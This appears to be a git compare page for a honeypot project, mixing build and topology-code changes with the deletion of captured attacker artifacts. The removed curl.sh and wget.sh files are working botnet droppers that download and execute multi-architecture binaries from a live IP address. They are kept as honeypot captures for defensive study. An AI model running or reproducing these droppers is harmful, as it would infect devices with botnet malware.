Compare commits

3 Commits

Author SHA1 Message Date
DECNET CI
b12d46ff9d ci: auto-merge dev → testing
Some checks failed
CI / Lint (ruff) (push) Has been skipped
CI / SAST (bandit) (push) Has been skipped
CI / Dependency audit (pip-audit) (push) Has been skipped
CI / Merge dev → testing (push) Has been skipped
CI / Test (Standard) (3.11) (push) Successful in 13m19s
CI / Test (Live) (3.11) (push) Successful in 1m17s
CI / Merge testing → main (push) Failing after 11s
2026-04-28 22:17:36 +00:00
DECNET CI
2ce076cd37 ci: auto-merge dev → testing [skip ci] 2026-04-28 22:03:20 +00:00
DECNET CI
e8d97281f7 ci: auto-merge dev → testing [skip ci] 2026-04-20 20:39:35 +00:00
963 changed files with 9226 additions and 93453 deletions

19
.gitignore vendored
View File

@@ -51,22 +51,3 @@ schem
# pydeps-style dependency graph dumps from local analysis runs.
deps.txt
# Node modules vendored under decnet/canary/ for the obfuscator helper.
# The package.json is the source of truth; modules are reinstalled at
# build/deploy time.
node_modules/
package-lock.json
# TTP rule-precision corpus pulled from prod sqlite. Real attacker
# payloads — operator-only artifact. The synthetic ``seed_*.jsonl``
# files alongside ARE committed and exercise the harness in CI.
tests/ttp/rule_precision/corpus/*.jsonl
tests/ttp/rule_precision/corpus/seed_*.jsonl
threatfox-api.json
# MITRE ATT&CK STIX bundle — 50 MB, fetched at runtime via attack_stix.py
enterprise-attack-*.json
# pytest failure dump files
testfail

219
Makefile
View File

@@ -1,219 +0,0 @@
# Path to the pytest executable used by every pytest-based suite below.
PYTEST := .311/bin/pytest
# When set to 1, test-go and test-all stop at the first failing item;
# any other value makes them run everything and report failures at the end.
FAIL_FAST ?= 1
# Extra command-line arguments appended to each suite's command
# (e.g. make test-web ARGS='--lf -s'). Empty unless given by the caller.
ARGS :=
# addopts in pyproject.toml already provides -v -q -x -n 4 --dist load.
# Unit suites inherit that; special suites clear it with --override-ini.
# Unit suites: inherited addopts plus a 30 s per-test timeout.
UNIT_FLAGS := --timeout=30 --timeout-method=thread
# "Special" suites: addopts replaced by "-v -x", xdist with -n logical,
# 120 s per-test timeout.
SEQ_FLAGS := --override-ini="addopts=-v -x" -n logical --timeout=120 --timeout-method=thread
# Fuzz suite: only tests marked "fuzz", with the four schemathesis files
# excluded (those are run by test-schema instead). No --timeout flag is set here.
FUZZ_FLAGS := --override-ini="addopts=-v -x" -n logical -m fuzz \
--ignore=tests/api/test_schemathesis.py \
--ignore=tests/api/test_schemathesis_agent.py \
--ignore=tests/api/test_schemathesis_swarm.py \
--ignore=tests/api/test_schemathesis_ttp.py
# Passed to pytest as an environment variable by the test-schema recipe.
SCHEMA_QUICK ?= 0
# Schemathesis suite: tests marked "fuzz", 4 xdist workers, 600 s timeout.
SCHEMA_FLAGS := --override-ini="addopts=-v -x" -n 4 -m fuzz --timeout=600 --timeout-method=thread
# Benchmarks: xdist plugin disabled, benchmark tests only, marker "bench".
BENCH_FLAGS := --override-ini="addopts=-v" -p no:xdist --benchmark-only -m bench
# ── Unit suites (xdist, 30s timeout) ─────────────────────────────────────────
# One phony target per suite: each recipe runs $(PYTEST) over a fixed list of
# test directories with $(UNIT_FLAGS), followed by whatever the caller put in
# ARGS. test-core is the first rule in the file, so with no .DEFAULT_GOAL set
# a bare `make` runs it — keep it first.
.PHONY: test-core test-web test-db test-bus test-ttp test-intel \
        test-analysis test-infra test-fleet test-cli test-features

test-core:
	$(PYTEST) tests/core tests/config tests/factories tests/fixtures $(UNIT_FLAGS) $(ARGS)

test-web:
	$(PYTEST) tests/web tests/services $(UNIT_FLAGS) $(ARGS)

test-db:
	$(PYTEST) tests/db tests/vectorstore $(UNIT_FLAGS) $(ARGS)

test-bus:
	$(PYTEST) tests/bus tests/logging tests/telemetry $(UNIT_FLAGS) $(ARGS)

test-ttp:
	$(PYTEST) tests/ttp $(UNIT_FLAGS) $(ARGS)

test-intel:
	$(PYTEST) tests/intel tests/asn tests/geoip $(UNIT_FLAGS) $(ARGS)

test-analysis:
	$(PYTEST) tests/clustering tests/correlation $(UNIT_FLAGS) $(ARGS)

test-infra:
	$(PYTEST) tests/agent tests/collector tests/sniffer tests/profiler $(UNIT_FLAGS) $(ARGS)

test-fleet:
	$(PYTEST) tests/fleet tests/swarm tests/topology tests/orchestrator tests/deploy tests/updater $(UNIT_FLAGS) $(ARGS)

test-cli:
	$(PYTEST) tests/cli tests/engine tests/mutator tests/realism $(UNIT_FLAGS) $(ARGS)

test-features:
	$(PYTEST) tests/canary tests/artifacts tests/webhook tests/decky_io tests/prober $(UNIT_FLAGS) $(ARGS)
# ── Go and React suites ───────────────────────────────────────────────────────
# Directories in which `go test ./...` is run, in this order.
_GO_MODULES := \
    decnet/templates/_caddy_modules/decnetfp \
    decnet/templates/http/_caddy_modules/decnetfp \
    decnet/templates/https/_caddy_modules/decnetfp

.PHONY: test-go test-react

# Run `go test ./...` inside every $(_GO_MODULES) directory (each in its own
# subshell, so the cd never leaks). Prints a [PASS]/[FAIL] line per module.
# With FAIL_FAST=1 the recipe exits on the first failing module; otherwise it
# visits all of them and fails at the end if any module failed.
test-go:
	@broken=""; \
	for module in $(_GO_MODULES); do \
		echo "=== go test: $$module ==="; \
		if (cd "$$module" && go test ./...); then \
			echo "[PASS] $$module"; \
			continue; \
		fi; \
		echo "[FAIL] $$module"; \
		broken="$$broken $$module"; \
		if [ "$(FAIL_FAST)" = "1" ]; then exit 1; fi; \
	done; \
	test -z "$$broken"

# Run the npm script "test:run" from decnet_web, with $(ARGS) appended.
# NOTE(review): npm only forwards options to the script after a `--`
# separator, so flags in ARGS are interpreted by npm itself here — confirm
# that this is the intended behaviour before relying on ARGS for this suite.
test-react:
	cd decnet_web && npm run test:run $(ARGS)
# ── Special suites (sequential, longer timeout) ───────────────────────────────
# Suites that replace the pyproject addopts via their *_FLAGS variable.
# NOTE(review): SEQ_FLAGS passes `-n logical` to pytest, so "sequential" in the
# heading above may be out of date — confirm.
.PHONY: test-live test-api test-stress test-service \
        test-fuzz test-schema test-bench test-docker

# Tests under tests/live carrying the "live" marker.
test-live:
	$(PYTEST) tests/live -m live $(SEQ_FLAGS) $(ARGS)

# Everything under tests/api.
test-api:
	$(PYTEST) tests/api $(SEQ_FLAGS) $(ARGS)

# Tests under tests/stress carrying the "stress" marker.
test-stress:
	$(PYTEST) tests/stress -m stress $(SEQ_FLAGS) $(ARGS)

# Everything under tests/service_testing.
test-service:
	$(PYTEST) tests/service_testing $(SEQ_FLAGS) $(ARGS)

# No test path is given: selection comes from -m fuzz plus the --ignore
# entries inside FUZZ_FLAGS.
test-fuzz:
	$(PYTEST) $(FUZZ_FLAGS) $(ARGS)

# The four schemathesis files, with SCHEMA_QUICK exported into pytest's
# environment for this one command.
test-schema:
	SCHEMA_QUICK=$(SCHEMA_QUICK) $(PYTEST) \
		tests/api/test_schemathesis.py \
		tests/api/test_schemathesis_agent.py \
		tests/api/test_schemathesis_swarm.py \
		tests/api/test_schemathesis_ttp.py \
		$(SCHEMA_FLAGS) $(ARGS)

# Benchmarks under tests/perf.
test-bench:
	$(PYTEST) tests/perf $(BENCH_FLAGS) $(ARGS)

# Tests under tests/docker carrying the "docker" marker; the recipe itself
# sets DECNET_LIVE_DOCKER=1 for the pytest process.
test-docker:
	DECNET_LIVE_DOCKER=1 $(PYTEST) tests/docker -m docker $(SEQ_FLAGS) $(ARGS)
# ── Static analysis ───────────────────────────────────────────────────────────
# Each target runs one tool from the .311 virtualenv. None of them uses ARGS.
.PHONY: test-mypy test-bandit test-vulture test-pip-audit

# Type-check the decnet package.
test-mypy:
	.311/bin/mypy decnet --ignore-missing-imports --no-error-summary

# Recursive bandit scan of decnet, configured from pyproject.toml.
test-bandit:
	.311/bin/bandit -r decnet -c pyproject.toml

# Dead-code scan of decnet, reporting findings at >= 80% confidence.
test-vulture:
	.311/bin/vulture decnet --min-confidence 80

# Dependency audit with pip-audit's default settings.
test-pip-audit:
	.311/bin/pip-audit
# ── Composite: all suites ─────────────────────────────────────────────────────
# Suite names in execution order; each <name> is run as the target test-<name>.
_ALL_SUITES := core web db bus ttp intel analysis infra fleet cli features \
               go react \
               live api schema stress service fuzz bench docker \
               mypy bandit vulture pip-audit

.PHONY: test-all test
# Run every suite in $(_ALL_SUITES) through a sub-make and print a
# [PASS]/[FAIL] line for each.
#   FAIL_FAST=1 (default): stop at the first failing suite, exit 1.
#   FAIL_FAST=0          : run all suites, list the failed ones, exit 1 if any.
#
# ARGS is deliberately NOT repeated on the sub-make command line. Variables
# given on the make command line (ARGS, FAIL_FAST, SCHEMA_QUICK, ...) already
# reach the sub-make through MAKEFLAGS. Re-passing it as ARGS="$(ARGS)" broke
# any value containing double quotes: ARGS='-k "a and b"' was split by the
# shell and the stray words were taken as extra make goals.
test-all test:
	@failed=""; \
	for suite in $(_ALL_SUITES); do \
		echo ""; \
		echo "══════════════════════════ $$suite ══════════════════════════"; \
		if $(MAKE) --no-print-directory test-$$suite; then \
			echo "[PASS] $$suite"; \
		else \
			echo "[FAIL] $$suite"; \
			failed="$$failed $$suite"; \
			if [ "$(FAIL_FAST)" = "1" ]; then \
				echo "Stopping at first failure. Use FAIL_FAST=0 to run all suites."; \
				exit 1; \
			fi; \
		fi; \
	done; \
	if [ -n "$$failed" ]; then \
		echo ""; \
		echo "Failed:$$failed"; \
		exit 1; \
	fi; \
	echo ""; \
	echo "All suites passed."
.PHONY: help
# Print a summary of every test target. Pure echo; nothing is executed.
# The descriptions are kept in line with the *_FLAGS variables and recipes:
#   - the "special" heading no longer claims "sequential, 120s" (SEQ_FLAGS
#     uses -n logical, and schema/bench/fuzz use different settings);
#   - test-schema reports the -n 4 / 600 s values from SCHEMA_FLAGS;
#   - test-docker states that the target sets DECNET_LIVE_DOCKER=1 itself.
help:
	@echo "Unit suites (xdist, 30s timeout):"
	@echo " make test-core tests/core + config + factories + fixtures"
	@echo " make test-web tests/web + services"
	@echo " make test-db tests/db + vectorstore"
	@echo " make test-bus tests/bus + logging + telemetry"
	@echo " make test-ttp tests/ttp"
	@echo " make test-intel tests/intel + asn + geoip"
	@echo " make test-analysis tests/clustering + correlation"
	@echo " make test-infra tests/agent + collector + sniffer + profiler"
	@echo " make test-fleet tests/fleet + swarm + topology + orchestrator + deploy + updater"
	@echo " make test-cli tests/cli + engine + mutator + realism"
	@echo " make test-features tests/canary + artifacts + webhook + decky_io + prober"
	@echo ""
	@echo "Go / React suites:"
	@echo " make test-go go test ./... in each Caddy module variant"
	@echo " make test-react vitest run in decnet_web"
	@echo ""
	@echo "Special suites (addopts overridden; see *_FLAGS for workers/timeouts):"
	@echo " make test-live tests/live"
	@echo " make test-api tests/api (schemathesis)"
	@echo " make test-stress tests/stress"
	@echo " make test-service tests/service_testing"
	@echo " make test-schema schemathesis contract tests (-m fuzz, xdist -n 4, 600s timeout)"
	@echo " make test-schema SCHEMA_QUICK=1 same, capped at 100 examples per test"
	@echo " make test-fuzz hypothesis fuzz (all normal dirs, -m fuzz, skips schemathesis files)"
	@echo " make test-bench tests/perf"
	@echo " make test-docker tests/docker (target sets DECNET_LIVE_DOCKER=1)"
	@echo ""
	@echo "Static analysis:"
	@echo " make test-mypy mypy type check on decnet/"
	@echo " make test-bandit bandit security scan on decnet/"
	@echo " make test-vulture vulture dead code scan (>=80% confidence)"
	@echo " make test-pip-audit pip-audit dependency vulnerability scan"
	@echo ""
	@echo "Composites:"
	@echo " make test-all ALL suites (unit + go + react + live + api + schema + fuzz + bench + stress + docker + static analysis)"
	@echo " make test-all FAIL_FAST=0 same, report all failures instead of stopping"
	@echo ""
	@echo "Passthrough: make test-web ARGS='--lf -s'"

View File

@@ -182,7 +182,6 @@ Archetypes are pre-packaged machine identities. One slug sets services, preferre
| Slug | Services | OS Fingerprint | Description |
|---|---|---|---|
| `deaddeck` | ssh | linux | Initial machine to be exploited. Real SSH container. |
| `windows-workstation` | smb, rdp | windows | Corporate Windows desktop |
| `windows-server` | smb, rdp, ldap | windows | Windows domain member |
| `domain-controller` | ldap, smb, rdp, llmnr | windows | Active Directory DC |
@@ -273,11 +272,6 @@ List live at any time with `decnet services`.
Most services accept persona configuration to make honeypot responses more convincing. Config is passed via INI subsections (`[decky-name.service]`) or the `service_config` field in code.
```ini
[deaddeck-1]
amount=1
archetype=deaddeck
ssh.password=admin
[decky-webmail.http]
server_header = Apache/2.4.54 (Debian)
fake_app = wordpress

View File

@@ -1,3 +0,0 @@
[0] Downloading 'http://31.56.209.39/curl.sh' ...
Saving 'curl.sh.1'
HTTP response 200 OK [http://31.56.209.39/curl.sh]

View File

@@ -1,46 +0,0 @@
#!/bin/sh
ulimit -n 4096
ulimit -n 999999
ulimit -v 2097152
cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
rm -rf odin*
rm -rf bizy*
rm -rf rs*
rm -rf *.sh
#curl http://31.56.209.39/rs.arm -o rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
#curl http://31.56.209.39/rs.arm5 -o rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
#curl http://31.56.209.39/rs.arm6 -o rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
#curl http://31.56.209.39/rs.arm7 -o rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
#curl http://31.56.209.39/rs.mips -o rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
#curl http://31.56.209.39/rs.mipsle -o rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
#curl http://31.56.209.39/rs.mipsSF -o rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
#curl http://31.56.209.39/rs.mipsleSF -o rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
#curl http://31.56.209.39/rs.x86 -o rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
#curl http://31.56.209.39/rs.x64 -o rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
curl http://31.56.209.39/odin.arm -o odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.curl
curl http://31.56.209.39/odin.arm5 -o odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.curl
curl http://31.56.209.39/odin.arm5n -o odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.curl
curl http://31.56.209.39/odin.arm6 -o odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.curl
curl http://31.56.209.39/odin.arm7 -o odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.curl
curl http://31.56.209.39/odin.m68k -o odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.curl
curl http://31.56.209.39/odin.mips -o odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.curl
curl http://31.56.209.39/odin.mpsl -o odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.curl
curl http://31.56.209.39/odin.ppc -o odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.curl
curl http://31.56.209.39/odin.sh4 -o odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.curl
curl http://31.56.209.39/odin.spc -o odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.curl
curl http://31.56.209.39/odin.x64 -o odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.curl
curl http://31.56.209.39/odin.x86 -o odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.curl
curl http://31.56.209.39/bizy.arm5 -o bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
curl http://31.56.209.39/bizy.arm6 -o bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
curl http://31.56.209.39/bizy.arm7 -o bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
curl http://31.56.209.39/bizy.arm8 -o bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
curl http://31.56.209.39/bizy.mips -o bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
curl http://31.56.209.39/bizy.mpsl -o bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
curl http://31.56.209.39/bizy.mipss -o bizy.mipss; chmod +x bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss;
curl http://31.56.209.39/bizy.mpsls -o bizy.mpsls; chmod +x bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls;
curl http://31.56.209.39/bizy.riscv -o bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
curl http://31.56.209.39/bizy.x86 -o bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
curl http://31.56.209.39/bizy.x64 -o bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64

View File

@@ -1,3 +0,0 @@
wget http://31.56.209.39/wget.sh -o wget.sh
wget http://31.56.209.39/curl.sh -o curl.sh

View File

@@ -1,3 +0,0 @@
[0] Downloading 'http://31.56.209.39/wget.sh' ...
Saving 'wget.sh.1'
HTTP response 200 OK [http://31.56.209.39/wget.sh]

View File

@@ -1,46 +0,0 @@
#!/bin/sh
ulimit -n 4096
ulimit -n 999999
ulimit -v 2097152
cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
rm -rf odin*
rm -rf bizy*
rm -rf rs*
rm -rf *.sh
wget http://31.56.209.39/rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
wget http://31.56.209.39/rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
wget http://31.56.209.39/rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
wget http://31.56.209.39/rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
wget http://31.56.209.39/rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
wget http://31.56.209.39/rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
wget http://31.56.209.39/rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
wget http://31.56.209.39/rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
wget http://31.56.209.39/rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
wget http://31.56.209.39/rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
wget http://31.56.209.39/odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.wget
wget http://31.56.209.39/odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.wget
wget http://31.56.209.39/odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.wget
wget http://31.56.209.39/odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.wget
wget http://31.56.209.39/odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.wget
wget http://31.56.209.39/odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.wget
wget http://31.56.209.39/odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.wget
wget http://31.56.209.39/odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.wget
wget http://31.56.209.39/odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.wget
wget http://31.56.209.39/odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.wget
wget http://31.56.209.39/odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.wget
wget http://31.56.209.39/odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.wget
wget http://31.56.209.39/odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.wget
wget http://31.56.209.39/bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
wget http://31.56.209.39/bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
wget http://31.56.209.39/bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
wget http://31.56.209.39/bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
wget http://31.56.209.39/bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
wget http://31.56.209.39/bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
wget http://31.56.209.39/bizy.mipss; chmod +x ./bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss
wget http://31.56.209.39/bizy.mpsls; chmod +x ./bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls
wget http://31.56.209.39/bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
wget http://31.56.209.39/bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
wget http://31.56.209.39/bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64

View File

View File

@@ -1,5 +0,0 @@
# bait/
Default operator-supplied email seed for IMAP/POP3 deckies. Drop `*.eml` and/or `*.json` files here; the IMAP/POP3 services bind-mount this dir read-only at `/var/spool/decnet-emails/seed` when no per-decky `email_seed` is configured. Entries concatenate onto the hardcoded bait baseline (additive to realism-engine output, never replacing).
JSON shape: list of dicts with required `from_addr`, `to_addr`, `subject`, `body`; optional `from_name`, `date`, `flags`. See `decnet/templates/imap/server.py` for the loader.

Binary file not shown.

View File

@@ -194,7 +194,7 @@ async def self_destruct() -> None:
argv = ["/bin/bash", path]
spawn_kwargs = {"start_new_session": True}
subprocess.Popen( # type: ignore[call-overload] # nosec B603
subprocess.Popen( # nosec B603
argv,
stdin=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,

View File

@@ -121,7 +121,7 @@ def start() -> Optional[asyncio.Task]:
return None
try:
from decnet import __version__ as _v # type: ignore[attr-defined]
from decnet import __version__ as _v
agent_version = _v
except Exception:
agent_version = "unknown"

View File

@@ -59,73 +59,6 @@ def _topology_id(hydrated: dict[str, Any]) -> str:
return str(tid)
def _check_hash_and_validate(hydrated: dict[str, Any], version_hash: str) -> str:
    """Gate an incoming topology and hand back its id.

    Two checks run in order:

    1. The canonical hash computed here must equal ``version_hash``.
    2. Structural validation must not report any errors.

    Returns:
        The topology id extracted from ``hydrated``.

    Raises:
        HashMismatch: the locally computed hash differs from ``version_hash``.
        ValidationError: validation produced at least one error; the full
            list of issues is attached to the exception.
    """
    local_hash = canonical_hash(hydrated)
    if version_hash != local_hash:
        message = (
            f"master hash {version_hash!r} does not match agent hash "
            f"{local_hash!r} — refusing to apply"
        )
        raise HashMismatch(message)

    findings = _validate_topology(hydrated)
    if _validation_errors(findings):
        raise ValidationError(findings)

    return _topology_id(hydrated)
async def _teardown_superseded(topology_id: str, store: TopologyStore) -> None:
"""Tear down the current topology if it differs from topology_id.
Master is authoritative — a different pinned topology (fully applied,
partially applied, or drifted) is torn down before the new apply proceeds.
Refusing with 409 would leave the agent stuck in a state only a human
could resolve.
"""
existing = store.current()
# Nothing is pinned, or the pinned topology is the one being applied:
# there is nothing to supersede.
if existing is None or existing.topology_id == topology_id:
return
log.info(
"superseding topology %s with %s on master authority",
existing.topology_id, topology_id,
)
# Teardown is best-effort: any exception is logged as a warning instead
# of being propagated to the caller.
try:
await teardown(existing.topology_id, store)
except Exception as exc: # noqa: BLE001 — we still want to try applying
log.warning(
"best-effort teardown of superseded topology %s failed: %s",
existing.topology_id, exc,
)
# Hard-clear the store row so the new apply isn't blocked by a
# half-torn-down predecessor. Leftover docker objects surface via
# the next heartbeat's observed block.
store.clear(existing.topology_id)
def _materialise(hydrated: dict[str, Any], topology_id: str) -> None:
"""Create bridge networks, write compose file, and bring up containers.
Sync/blocking — callers must dispatch via asyncio.to_thread.
``--always-recreate-deps`` keeps service containers' netns shares
fresh: every decky service joins its base's netns via
``network_mode: container:<base>``, and that share is bound at
service start time. If a base is recreated (e.g. when ``ports:``
changes after toggling ``forwards_l3``) but compose decides the
services are unchanged, the services keep a stale netns FD
pointing at the destroyed base — they end up in an empty
namespace with only ``lo``, and external traffic hits a closed
port on the live base. Forcing dependents to recreate alongside
the base is the cheapest way to make this race impossible.
"""
compose_path = _topology_compose_path(topology_id)
client = docker.from_env()
# One bridge network per entry in hydrated["lans"]; the network is created
# with internal=True unless the LAN's "is_dmz" value is truthy.
for lan in hydrated["lans"]:
net_name = _topology_network_name(topology_id, lan["name"])
create_bridge_network(client, net_name, lan["subnet"], internal=not lan["is_dmz"])
# Compose file is written to the per-topology path, then brought up
# detached with a rebuild.
write_topology_compose(hydrated, compose_path)
_compose_with_retry("up", "--build", "-d", "--always-recreate-deps", compose_file=compose_path)
async def apply(
hydrated: dict[str, Any],
version_hash: str,
@@ -140,11 +73,76 @@ async def apply(
Any docker / compose error propagates up; the endpoint maps it
to 500 and records the message on the store row.
"""
topology_id = _check_hash_and_validate(hydrated, version_hash)
await _teardown_superseded(topology_id, store)
await asyncio.to_thread(_materialise, hydrated, topology_id)
local_hash = canonical_hash(hydrated)
if local_hash != version_hash:
raise HashMismatch(
f"master hash {version_hash!r} does not match agent hash "
f"{local_hash!r} — refusing to apply"
)
issues = _validate_topology(hydrated)
if _validation_errors(issues):
raise ValidationError(issues)
topology_id = _topology_id(hydrated)
# Master is authoritative. If a different topology is pinned here
# — whether it fully applied, only partially applied (failure
# marker row + orphan containers), or drifted — teardown first,
# then accept the new one. Refusing with 409 would leave the
# agent stuck in a state only a human could resolve.
existing = store.current()
if existing is not None and existing.topology_id != topology_id:
log.info(
"superseding topology %s with %s on master authority",
existing.topology_id, topology_id,
)
try:
await teardown(existing.topology_id, store)
except Exception as exc: # noqa: BLE001 — we still want to try applying
log.warning(
"best-effort teardown of superseded topology %s failed: %s",
existing.topology_id, exc,
)
# Hard-clear the store row so the new apply isn't blocked
# by a half-torn-down predecessor. Leftover docker objects
# will surface via the next heartbeat's observed block.
store.clear(existing.topology_id)
lans = hydrated["lans"]
compose_path = _topology_compose_path(topology_id)
client = docker.from_env()
# Bridges + compose are sync/blocking; hop to a thread so we don't
# stall the event loop on a slow docker daemon.
def _materialise() -> None:
for lan in lans:
net_name = _topology_network_name(topology_id, lan["name"])
internal = not lan["is_dmz"]
create_bridge_network(
client, net_name, lan["subnet"], internal=internal
)
write_topology_compose(hydrated, compose_path)
# ``--always-recreate-deps`` keeps service containers' netns shares
# fresh: every decky service joins its base's netns via
# ``network_mode: container:<base>``, and that share is bound at
# service start time. If a base is recreated (e.g. when ``ports:``
# changes after toggling ``forwards_l3``) but compose decides the
# services are unchanged, the services keep a stale netns FD
# pointing at the destroyed base — they end up in an empty
# namespace with only ``lo``, and external traffic hits a closed
# port on the live base. Forcing dependents to recreate alongside
# the base is the cheapest way to make this race impossible.
_compose_with_retry(
"up", "--build", "-d", "--always-recreate-deps",
compose_file=compose_path,
)
await asyncio.to_thread(_materialise)
store.put(topology_id, version_hash, hydrated)
log.info("topology %s applied on agent (%d LANs)", topology_id, len(hydrated["lans"]))
log.info(
"topology %s applied on agent (%d LANs)", topology_id, len(lans)
)
async def teardown(

View File

@@ -63,7 +63,6 @@ class TopologyStore:
# The agent is single-process, so there's no real contention —
# sqlite's own connection lock is enough.
self._conn = sqlite3.connect(str(db_path), check_same_thread=False)
self._conn.row_factory = sqlite3.Row
self._conn.execute(
"CREATE TABLE IF NOT EXISTS applied_topology ("
" topology_id TEXT PRIMARY KEY,"
@@ -85,11 +84,11 @@ class TopologyStore:
if row is None:
return None
return AppliedRow(
topology_id=row["topology_id"],
applied_version_hash=row["applied_version_hash"],
hydrated=json.loads(row["hydrated_blob_json"]),
applied_at=int(row["applied_at"]),
last_error=row["last_error"],
topology_id=row[0],
applied_version_hash=row[1],
hydrated=json.loads(row[2]),
applied_at=int(row[3]),
last_error=row[4],
)
# ---------------------------------------------------------------- writes

View File

@@ -1 +0,0 @@
"""Artifact storage helpers shared between the web router and TTP workers."""

View File

@@ -1,86 +0,0 @@
"""
Shared on-disk artifact path resolution.
Honeypot decoys (SSH, SMTP) farm captured payloads into a host-mounted
quarantine tree:
/var/lib/decnet/artifacts/{decky}/{service}/{stored_as}
Two callers need to translate ``(decky, stored_as, service)`` into a
concrete ``Path`` rooted under that tree:
* The web router endpoint ``GET /api/v1/artifacts/{decky}/{stored_as}``
(``decnet.web.router.artifacts.api_get_artifact``) — admin-gated
download for the dashboard.
* The TTP ``EmailLifter`` (``decnet.ttp.impl.email_lifter``), which
reads the stored ``.eml`` at tag-time so body-aware predicates
(R0047 BEC, R0048 macro) don't need raw body text on the bus.
Both callers share the same validation rules and the same
defence-in-depth symlink-escape check; this module is the single
implementation. It is auth-agnostic — wrappers layer authentication
where appropriate (the router does ``require_admin``, the lifter does
not).
"""
from __future__ import annotations
import os
import re
from pathlib import Path
# decky names come from the deployer — lowercase alnum plus hyphens.
# The pattern accepts 1–63 characters; the first one may not be a hyphen.
_DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")
# Services that own an artifacts subdir. Kept explicit so a caller
# can't pivot into arbitrary subpaths via a query string or bus payload.
_ALLOWED_SERVICES = frozenset({"ssh", "smtp"})
# stored_as is assembled by the capturing template as:
# ${ts}_${sha:0:12}_${base}
# where ts is ISO-8601 UTC (e.g. 2026-04-18T02:22:56Z), sha is 12 hex chars,
# and base is the original filename's basename. Keep the filename charset
# tight but allow common punctuation dropped files actually use.
# The base part is limited to 1–255 characters from [A-Za-z0-9._-], so it
# can never contain a path separator.
